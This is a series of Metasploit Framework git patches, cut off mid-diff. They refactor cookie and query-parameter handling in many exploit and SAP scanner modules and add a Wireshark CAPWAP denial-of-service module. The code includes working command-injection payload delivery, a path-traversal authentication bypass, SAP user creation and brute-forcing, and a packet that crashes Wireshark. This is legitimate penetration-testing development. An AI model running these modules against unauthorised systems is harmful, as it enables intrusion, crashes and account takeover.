b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(//).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 29/47] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") From 71e2d19040df63bf51b1f123532cc6bcc4f00b8b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 24 May 2014 18:53:10 +0100 Subject: [PATCH 30/47] Adapted to auxiliary modules structure --- modules/auxiliary/dos/wireshark/capwap.rb | 54 +++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/capwap.rb diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb new file mode 100644 index 0000000000..12feb83d96 --- /dev/null +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -0,0 +1,54 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Udp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DisclosureDate' => 'Apr 28 2014')) + + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def run + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # the dissector crash + # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt + # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 + buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15) + udp_sock.put(buf) + + disconnect_udp + + end +end From 9f166b87f6479b5639862cb8ea99fcd8c332e87d Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 24 May 2014 18:58:36 +0100 Subject: [PATCH 31/47] Changed the description --- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 12feb83d96..6555ab5dcf 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Exploit and msf module + 'j0sm1', # Auxiliary msf module 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => From da0a9f66ea93307cf2985dab3f75cf5611932cc8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 25 May 2014 19:29:39 +0200 Subject: [PATCH 32/47] Resolved all msftidy vars_get warnings --- lib/rex/proto/http/client_request.rb | 10 +++++-- .../scanner/sap/sap_soap_bapi_user_create1.rb | 16 +++++++---- .../scanner/sap/sap_soap_rfc_brute_login.rb | 15 ++++++---- ...fc_dbmcli_sxpg_call_system_command_exec.rb | 10 +++++-- .../sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 10 +++++-- .../scanner/sap/sap_soap_rfc_ping.rb | 17 ++++++----- .../scanner/sap/sap_soap_rfc_read_table.rb | 17 +++++------ .../sap_soap_rfc_susr_rfc_user_interface.rb | 17 ++++++----- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 14 ++++++---- .../sap/sap_soap_rfc_sxpg_command_exec.rb | 8 ++++-- .../scanner/sap/sap_soap_rfc_system_info.rb | 8 ++++-- .../sap/sap_soap_th_saprel_disclosure.rb | 10 +++++-- .../linux/http/openfiler_networkcard_exec.rb | 8 ++++-- .../linux/http/sophos_wpa_iface_exec.rb | 26 ++++++++++++----- .../linux/http/zen_load_balancer_exec.rb | 14 ++++++---- .../multi/http/hyperic_hq_script_console.rb | 12 ++++++-- .../multi/http/openfire_auth_bypass.rb | 28 +++++++++++-------- .../http/adobe_robohelper_authbypass.rb | 18 ++++++------ .../http/desktopcentral_file_upload.rb | 14 +++++++--- .../windows/http/hp_nnm_ovalarm_lang.rb | 9 ++++-- .../exploits/windows/http/sybase_easerver.rb | 11 +++++--- .../windows/http/zenworks_uploadservlet.rb | 21 +++++++------- .../lib/rex/proto/http/client_request_spec.rb | 6 ++++ 23 files changed, 206 insertions(+), 113 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2758d8fa77..4336909510 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -112,12 +112,16 @@ class ClientRequest opts['vars_get'].each_pair do |var,val| var = var.to_s - val = val.to_s qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - qstr << '=' - qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + # support get paraemter without value + # Example: uri?parameter + if val + val = val.to_s + qstr << '=' + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + end end if (opts['pad_post_params']) diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 7a9535e6a9..ca96bb83eb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -70,17 +70,21 @@ class Metasploit4 < Msf::Auxiliary data << '' begin print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'") + res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } }) if res and res.code == 200 if res.body =~ /

Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index d19a43b7c7..142697e92b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -118,16 +118,19 @@ class Metasploit4 < Msf::Auxiliary data << '' begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(username, password), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } }) if res and res.code == 200 report_auth_info( diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 72460a04fc..c20283e921 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index b8ec123d75..fc110dbd7b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index ec95f65519..be20e21b59 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 if res and res.body =~ /

Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - login failed!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index d7e7ad065b..3d19045911 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -83,19 +83,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], - #'Authorization' => 'Basic ' + user_pass, - #'Content-Type' => - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. if res.body =~ /

Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index f60e420352..d8f0f2ba23 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -70,17 +70,20 @@ class Metasploit4 < Msf::Auxiliary begin vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'") res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code == 200 if res.body =~ /

Logon failed<\/h1>/ vprint_error("[SAP] #{ip}:#{rport} - Logon failed") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index bab5a4f4c7..33c040c8ac 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 977001c395..7b2aad3ebe 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 0677878b96..db2a26bf6e 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index d02719355c..4695780832 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code == 200 diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index b1542c492e..d979506f7a 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/admin/system.html?step=2&device=lo#{cmd}", - 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'uri' => '/admin/system.html', + 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'vars_get' => { + 'step' => '2', + 'device' => "lo#{cmd}" + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unknown, 'Connection failed') diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ffc6163100..3da916023f 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -100,9 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ @@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'change_password' + } }) if !passchange or passchange.code != 200 @@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote } login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ @@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending payload") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => post, + 'vars_get' => { + 'c' => 'netinterface', + } }) end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 96e02f8cbf..71901569d9 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] - auth = Rex::Text.encode_base64("#{user}:#{pass}") cmd = Rex::Text.uri_encode(";#{payload.encoded}&") lines = rand(100) + 1 @@ -96,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", - 'headers' => - { - 'Authorization' => "Basic #{auth}" - } + 'uri' => '/index.cgi', + 'authorization' => basic_auth(user, pass), + 'vars_get' => { + 'nlines' => lines, + 'action' => 'See logs', + 'id' => '2-2', + 'filelog' => cmd + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, 'Connection failed') diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 19c9a442ed..597af3a40a 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="), + 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'method' => 'POST', 'cookie' => @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'submit' => 'Sign+in' + }, + 'vars_get' => { + 'org.apache.catalina.filters.CSRF_NONCE' => '' } }) @@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote # def get_nonce res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"), - 'cookie' => @cookie + 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'typeId' => '10003' + } }) if not res or res.code != 200 diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index bc346979d8..874e681659 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'method' => 'POST', 'data' => data, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=' + boundary, - 'Content-Length' => data.length, - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=' + boundary, + 'Content-Length' => data.length, + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'uploadplugin' => nil + } }) @@ -199,11 +201,13 @@ class Metasploit3 < 